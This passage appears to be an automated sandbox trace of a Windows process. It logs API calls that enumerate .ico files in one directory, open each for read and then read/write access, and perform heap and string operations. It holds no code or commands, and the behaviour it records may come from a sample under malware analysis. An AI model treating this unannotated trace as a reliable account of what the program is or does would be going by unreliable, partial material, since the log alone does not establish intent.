CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0062.022] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.022] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0062.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0062.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0062.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.024] AreFileApisANSI () returned 1 [0062.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico", lpUsedDefaultChar=0x0) returned 43 [0062.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0062.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.025] AreFileApisANSI () returned 1 [0062.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0062.025] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.025] GetFileType (hFile=0x41c) returned 0x1 [0062.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.025] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.025] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.026] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.026] CloseHandle (hObject=0x41c) returned 1 [0062.026] AreFileApisANSI () returned 1 [0062.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0062.026] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.026] GetFileType (hFile=0x41c) returned 0x1 [0062.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.026] CloseHandle (hObject=0x41c) returned 1 [0062.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.027] AreFileApisANSI () returned 1 [0062.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0062.028] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.028] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0062.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0062.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.029] AreFileApisANSI () returned 1 [0062.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico", lpUsedDefaultChar=0x0) returned 43 [0062.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0062.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0062.029] AreFileApisANSI () returned 1 [0062.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0062.029] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.063] GetFileType (hFile=0x41c) returned 0x1 [0062.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.063] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.063] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.063] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.063] CloseHandle (hObject=0x41c) returned 1 [0062.063] AreFileApisANSI () returned 1 [0062.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67660 [0062.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0062.063] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.064] GetFileType (hFile=0x41c) returned 0x1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0062.064] CloseHandle (hObject=0x41c) returned 1 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.065] HeapFree (in: hHeap=0x20000, 